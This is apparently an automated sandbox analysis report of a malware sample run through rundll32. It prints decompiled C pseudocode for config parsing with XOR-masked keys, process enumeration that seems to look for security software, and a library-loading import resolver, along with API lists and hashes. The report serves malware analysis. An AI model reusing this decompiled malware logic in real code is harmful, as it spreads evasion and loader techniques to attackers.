				if(E04B9210F( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
					 *0x4b9a374 = _v8;
				}
				_t33 =  *0x4b9a344; // 0x69b25f44
				if(E04B9210F( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0x4b9a344; // 0x69b25f44
				_push(_t116);
				if(E04B9210F( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L67:
					HeapFree( *0x4b9a2d8, 0, _v16);
					goto L69;
				} else {
					_push(_t101);
					_t102 = _v12;
					if(_t102 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0x4b9a344; // 0x69b25f44
						_t45 = E04B94C64(_t104, _t102, _t98 ^ 0x7895433b);
					}
					_push(_t119);
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x4b9a2e0 = _v8;
						}
					}
					if(_t102 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0x4b9a344; // 0x69b25f44
						_t46 = E04B94C64(_t104, _t102, _t94 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x4b9a2e4 = _v8;
						}
					}
					if(_t102 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0x4b9a344; // 0x69b25f44
						_t47 = E04B94C64(_t104, _t102, _t90 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x4b9a2e8 = _v8;
						}
					}
					if(_t102 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0x4b9a344; // 0x69b25f44
						_t48 = E04B94C64(_t104, _t102, _t86 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x4b9a004 = _v8;
						}
					}
					if(_t102 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0x4b9a344; // 0x69b25f44
						_t49 = E04B94C64(_t104, _t102, _t82 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x4b9a02c = _v8;
						}
					}
					if(_t102 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0x4b9a344; // 0x69b25f44
						_t50 = E04B94C64(_t104, _t102, _t78 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0x4b9a2ec = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t102 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0x4b9a344; // 0x69b25f44
								_t51 = E04B94C64(_t104, _t102, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E04B9586E(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E04B94408();
								}
							}
							if(_t102 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0x4b9a344; // 0x69b25f44
								_t52 = E04B94C64(_t104, _t102, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E04B9586E(0, _t52) != 0) {
								_t122 =  *0x4b9a3cc; // 0x5109600
								E04B97838(_t122 + 4, _t68);
							}
							if(_t102 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0x4b9a344; // 0x69b25f44
								_t53 = E04B94C64(_t104, _t102, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0x4b9a348; // 0x56d5a8
								_t22 = _t54 + 0x4b9b252; // 0x616d692f
								 *0x4b9a370 = _t22;
								goto L60;
							} else {
								_t64 = E04B9586E(0, _t53);
								 *0x4b9a370 = _t64;
								if(_t64 != 0) {
									L60:
									if(_t102 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0x4b9a344; // 0x69b25f44
										_t56 = E04B94C64(_t104, _t102, _t61 ^ 0xd2079859);
									}
									if(_t56 == 0) {
										_t57 =  *0x4b9a348; // 0x56d5a8
										_t23 = _t57 + 0x4b9b79e; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E04B9586E(0, _t56);
									}
									 *0x4b9a3e0 = _t58;
									HeapFree( *0x4b9a2d8, 0, _t102);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}








































                0x04b94cab
                0x04b94cab
                0x04b94cab
                0x04b94cab
                0x04b94cae
                0x04b94ccb
                0x04b94cd9
                0x04b94cd9
                0x04b94cde
                0x04b94cf8
                0x04b94f66
                0x04b94f6d
                0x04b94f71
                0x04b94f71
                0x04b94cfe
                0x04b94d03
                0x04b94d1b
                0x04b94f53
                0x04b94f5d
                0x00000000
                0x04b94d21
                0x04b94d21
                0x04b94d22
                0x04b94d27
                0x04b94d3d
                0x04b94d29
                0x04b94d29
                0x04b94d36
                0x04b94d36
                0x04b94d3f
                0x04b94d48
                0x04b94d4a
                0x04b94d54
                0x04b94d59
                0x04b94d59
                0x04b94d54
                0x04b94d60
                0x04b94d76
                0x04b94d62
                0x04b94d62
                0x04b94d6f
                0x04b94d6f
                0x04b94d7a
                0x04b94d7c
                0x04b94d86
                0x04b94d8b
                0x04b94d8b
                0x04b94d86
                0x04b94d92
                0x04b94da8
                0x04b94d94
                0x04b94d94
                0x04b94da1
                0x04b94da1
                0x04b94dac
                0x04b94dae
                0x04b94db8
                0x04b94dbd
                0x04b94dbd
                0x04b94db8
                0x04b94dc4
                0x04b94dda
                0x04b94dc6
                0x04b94dc6
                0x04b94dd3
                0x04b94dd3
                0x04b94dde
                0x04b94de0
                0x04b94dea
                0x04b94def
                0x04b94def
                0x04b94dea
                0x04b94df6
                0x04b94e0c
                0x04b94df8
                0x04b94df8
                0x04b94e05
                0x04b94e05
                0x04b94e10
                0x04b94e12
                0x04b94e1c
                0x04b94e21
                0x04b94e21
                0x04b94e1c
                0x04b94e28
                0x04b94e3e
                0x04b94e2a
                0x04b94e2a
                0x04b94e37
                0x04b94e37
                0x04b94e42
                0x04b94e55
                0x04b94e55
                0x00000000
                0x04b94e44
                0x04b94e44
                0x04b94e4e
                0x00000000
                0x04b94e5f
                0x04b94e5f
                0x04b94e61
                0x04b94e77
                0x04b94e63
                0x04b94e63
                0x04b94e70
                0x04b94e70
                0x04b94e7b
                0x04b94e7d
                0x04b94e80
                0x04b94e81
                0x04b94e88
                0x04b94e8a
                0x04b94e8b
                0x04b94e8b
                0x04b94e88
                0x04b94e92
                0x04b94ea8
                0x04b94e94
                0x04b94e94
                0x04b94ea1
                0x04b94ea1
                0x04b94eac
                0x04b94eba
                0x04b94ec4
                0x04b94ec4
                0x04b94ecc
                0x04b94ee2
                0x04b94ece
                0x04b94ece
                0x04b94edb
                0x04b94edb
                0x04b94ee6
                0x04b94ef9
                0x04b94ef9
                0x04b94efe
                0x04b94f04
                0x00000000
                0x04b94ee8
                0x04b94eeb
                0x04b94ef0
                0x04b94ef7
                0x04b94f09
                0x04b94f0b
                0x04b94f21
                0x04b94f0d
                0x04b94f0d
                0x04b94f1a
                0x04b94f1a
                0x04b94f25
                0x04b94f31
                0x04b94f36
                0x04b94f36
                0x04b94f27
                0x04b94f2a
                0x04b94f2a
                0x04b94f44
                0x04b94f49
                0x04b94f4f
                0x00000000
                0x04b94f52
                0x00000000
                0x04b94ef7
                0x04b94ee6
                0x04b94e4e
                0x04b94e42

                APIs
                • StrToIntExA.SHLWAPI(00000000,00000000,?,04B9A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04B94D50
                • StrToIntExA.SHLWAPI(00000000,00000000,?,04B9A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04B94D82
                • StrToIntExA.SHLWAPI(00000000,00000000,?,04B9A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04B94DB4
                • StrToIntExA.SHLWAPI(00000000,00000000,?,04B9A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04B94DE6
                • StrToIntExA.SHLWAPI(00000000,00000000,?,04B9A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04B94E18
                • StrToIntExA.SHLWAPI(00000000,00000000,?,04B9A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04B94E4A
                • HeapFree.KERNEL32(00000000,?,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 04B94F49
                • HeapFree.KERNEL32(00000000,?,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 04B94F5D
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: FreeHeap
                • String ID: Uet
                • API String ID: 3298025750-2766386878
                • Opcode ID: 9d288262242faf33dcbd17ec88bd5600145ecdc71d8f044110775100b937e704
                • Instruction ID: 648503414acb28780b5f24f864259a2c190d1439cdb7e24e2b452053f2999740
                • Opcode Fuzzy Hash: 9d288262242faf33dcbd17ec88bd5600145ecdc71d8f044110775100b937e704
                • Instruction Fuzzy Hash: FF818D70A18605BBDF24EBB4DAC496B77EDEB8C6007284DB6A001D7104FA39FD469720
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401BA8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00401BA8() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x4041b0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x4041bc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x4041ac = _t3;
						_t5 = GetCurrentProcessId();
						 *0x4041a8 = _t5;
						 *0x4041b0 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x4041a4 = _t6;
						if(_t6 == 0) {
							 *0x4041a4 =  *0x4041a4 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}










                0x00401ba9
                0x00401bb7
                0x00401bbd
                0x00401bc4
                0x00401c1b
                0x00401c1b
                0x00401bc6
                0x00401bce
                0x00401bdb
                0x00401bdb
                0x00401c17
                0x00401c19
                0x00000000
                0x00000000
                0x00000000
                0x00401bd0
                0x00401bd7
                0x00401bdd
                0x00401bdd
                0x00401be2
                0x00401bf0
                0x00401bf5
                0x00401bfb
                0x00401c01
                0x00401c08
                0x00401c0a
                0x00401c0a
                0x00401c14
                0x00401bd9
                0x00401bd9
                0x00000000
                0x00401bd9
                0x00401bd7

                APIs
                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00401C2C), ref: 00401BB7
                • GetVersion.KERNEL32 ref: 00401BC6
                • GetCurrentProcessId.KERNEL32 ref: 00401BE2
                • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401BFB
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.772858037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000002.772848945.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772865794.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772877043.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772888672.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                Similarity
                • API ID: Process$CreateCurrentEventOpenVersion
                • String ID: @Met`fet MetTet
                • API String ID: 845504543-3757152079
                • Opcode ID: 8234f8e7df4543caa7745a79373efb6b178ee26295734d7fe9e31f51aaa282f2
                • Instruction ID: a33e46edd0baa2e15e724dcf49771effb33b7f8f81d0fa99f28ae2a62cd4a38d
                • Opcode Fuzzy Hash: 8234f8e7df4543caa7745a79373efb6b178ee26295734d7fe9e31f51aaa282f2
                • Instruction Fuzzy Hash: 0DF03CB05853019BFB209F78BE097963FA4A796712F044136E741FA2F4E7B895C18B9C
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402565 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 195nativeCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00402565(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x4041f8;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x404240 = 1;
										__eflags =  *0x404240;
										if( *0x404240 != 0) {
											goto L60;
										}
										_t84 =  *0x4041f8;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x404240 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x4041f8 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x404200 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x4041fc + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x404200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x404200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x404240 = 1;
							__eflags =  *0x404240;
							if( *0x404240 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x404200 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x404200 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x404240 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x404200 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x4041f8 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x404200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x404200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































                0x0040256f
                0x00402572
                0x00402578
                0x00402596
                0x00000000
                0x00402596
                0x00402580
                0x00402589
                0x0040258f
                0x0040259e
                0x004025a1
                0x004025a4
                0x004025ae
                0x004025ae
                0x004025b0
                0x004025b3
                0x004025b5
                0x004025b5
                0x004025b7
                0x004025ba
                0x00000000
                0x00000000
                0x004025bc
                0x004025be
                0x00402624
                0x00402624
                0x00402782
                0x00000000
                0x00402782
                0x004025c0
                0x004025c0
                0x004025c4
                0x004025c6
                0x004025c6
                0x004025c6
                0x004025c6
                0x004025c9
                0x004025ca
                0x004025cd
                0x004025cd
                0x004025d1
                0x004025d5
                0x004025e3
                0x004025e3
                0x004025eb
                0x004025f1
                0x004025f3
                0x004025f5
                0x00402605
                0x00402612
                0x00402616
                0x0040261b
                0x0040261d
                0x0040269b
                0x0040269b
                0x0040261f
                0x0040261f
                0x0040261f
                0x0040269d
                0x0040269f
                0x00402780
                0x00402780
                0x00000000
                0x004026a5
                0x004026a5
                0x004026ac
                0x00000000
                0x00000000
                0x004026b2
                0x004026b6
                0x00402712
                0x00402714
                0x0040271c
                0x0040271e
                0x00402720
                0x00000000
                0x00000000
                0x00402722
                0x00402728
                0x0040272a
                0x0040272c
                0x00402741
                0x00402741
                0x00402743
                0x00402772
                0x00402779
                0x00000000
                0x00402779
                0x00402747
                0x00402748
                0x0040274a
                0x0040274c
                0x0040274c
                0x0040274e
                0x00402750
                0x00402752
                0x00402766
                0x00402766
                0x00402769
                0x0040276b
                0x0040276b
                0x0040276c
                0x0040276c
                0x00000000
                0x00402754
                0x00402754
                0x00402754
                0x0040275d
                0x0040275e
                0x00402760
                0x00402762
                0x00402762
                0x00000000
                0x00402754
                0x00402752
                0x0040272e
                0x00402735
                0x00402735
                0x00402737
                0x00000000
                0x00000000
                0x00402739
                0x0040273a
                0x0040273d
                0x0040273f
                0x00000000
                0x00000000
                0x00000000
                0x0040273f
                0x00000000
                0x00402735
                0x004026b8
                0x004026bb
                0x004026c0
                0x00000000
                0x00000000
                0x004026c9
                0x004026cb
                0x004026d1
                0x00000000
                0x00000000
                0x004026d7
                0x004026dd
                0x00000000
                0x00000000
                0x004026e3
                0x004026e5
                0x004026ee
                0x004026f2
                0x00000000
                0x00000000
                0x004026f8
                0x004026fb
                0x004026fd
                0x00000000
                0x00000000
                0x00402704
                0x00402706
                0x00000000
                0x00000000
                0x00402708
                0x0040270c
                0x00000000
                0x00000000
                0x00000000
                0x0040270c
                0x00000000
                0x00000000
                0x00000000
                0x004025f7
                0x004025f7
                0x004025f7
                0x004025fe
                0x00000000
                0x00000000
                0x00402600
                0x00402601
                0x00402603
                0x00000000
                0x00000000
                0x00000000
                0x00402603
                0x0040262b
                0x0040262d
                0x00000000
                0x00000000
                0x0040263d
                0x0040263f
                0x00402641
                0x00000000
                0x00000000
                0x00402647
                0x0040264e
                0x0040267a
                0x0040267a
                0x0040267c
                0x0040267e
                0x00402692
                0x00402694
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00402680
                0x00402680
                0x00402680
                0x00402689
                0x0040268a
                0x0040268c
                0x0040268e
                0x0040268e
                0x00000000
                0x00402680
                0x00402650
                0x00402653
                0x00402655
                0x00402667
                0x00402667
                0x0040266a
                0x0040266c
                0x0040266c
                0x0040266d
                0x0040266d
                0x00402673
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00402657
                0x00402657
                0x00402657
                0x0040265e
                0x00000000
                0x00000000
                0x00402660
                0x00402660
                0x00402661
                0x00000000
                0x00000000
                0x00000000
                0x00402661
                0x00402663
                0x00402665
                0x00402678
                0x00000000
                0x00000000
                0x00000000
                0x00402678
                0x00000000
                0x00402665
                0x004025d7
                0x004025da
                0x004025dd
                0x00000000
                0x00000000
                0x004025df
                0x004025e1
                0x00000000
                0x00000000
                0x00000000
                0x004025e1
                0x004025a6
                0x004025a8
                0x00000000
                0x00000000
                0x00000000
                0x00000000

                APIs
                • NtQueryVirtualMemory.NTDLL ref: 00402616
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.772858037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000002.772848945.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772865794.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772877043.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000003.00000002.772888672.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                Similarity
                • API ID: MemoryQueryVirtual
                • String ID: @B@$@B@$@B@
                • API String ID: 2850889275-824135644
                • Opcode ID: 5db2f640f3f824ace85a6282e0f6e49dfb23f40e338d13995ab38c96b1f5f191
                • Instruction ID: 4da47104038a29734a2657eb9a2c040d0d95a7db811d411bdad18f67836a8cdf
                • Opcode Fuzzy Hash: 5db2f640f3f824ace85a6282e0f6e49dfb23f40e338d13995ab38c96b1f5f191
                • Instruction Fuzzy Hash: 8661F2307006129FDB29CB28DB98A2A33E5EB95314F24847BD911F72D1E7B9DC82864C
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B928F6 Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                Download Yara Rule
                C-Code - Quality: 68%
                			E04B928F6() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x4b9a348; // 0x56d5a8
						_t2 = _t9 + 0x4b9bea8; // 0x73617661
						_push( &_v264);
						if( *0x4b9a12c() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                0x04b92901
                0x04b9290b
                0x04b9290f
                0x04b92919
                0x04b9294a
                0x04b92920
                0x04b92925
                0x04b92932
                0x04b9293b
                0x04b92952
                0x04b9293d
                0x04b92945
                0x00000000
                0x04b92945
                0x04b92953
                0x04b92954
                0x00000000
                0x04b92954
                0x00000000
                0x04b9294e
                0x04b9295a
                0x04b9295f

                APIs
                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04B92906
                • Process32First.KERNEL32(00000000,?), ref: 04B92919
                • Process32Next.KERNEL32(00000000,?), ref: 04B92945
                • CloseHandle.KERNEL32(00000000), ref: 04B92954
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                • String ID:
                • API String ID: 420147892-0
                • Opcode ID: b069a3ac2c5e66cd96e707052b9204123cb6a4712e83e3c74d79f81a98679595
                • Instruction ID: d02fa003b5b890ad8004ffe27186f630bab5f27fd707200c1615c115aa30fe71
                • Opcode Fuzzy Hash: b069a3ac2c5e66cd96e707052b9204123cb6a4712e83e3c74d79f81a98679595
                • Instruction Fuzzy Hash: 10F0BB33A011697AEF24A636AC48EDB37ECDBDA314F0104F5EE49D3000EA24FD4686B5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401385 Relevance: 3.1, APIs: 2, Instructions: 92libraryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00401385(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x4041c0;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71);
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x69b25f44;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
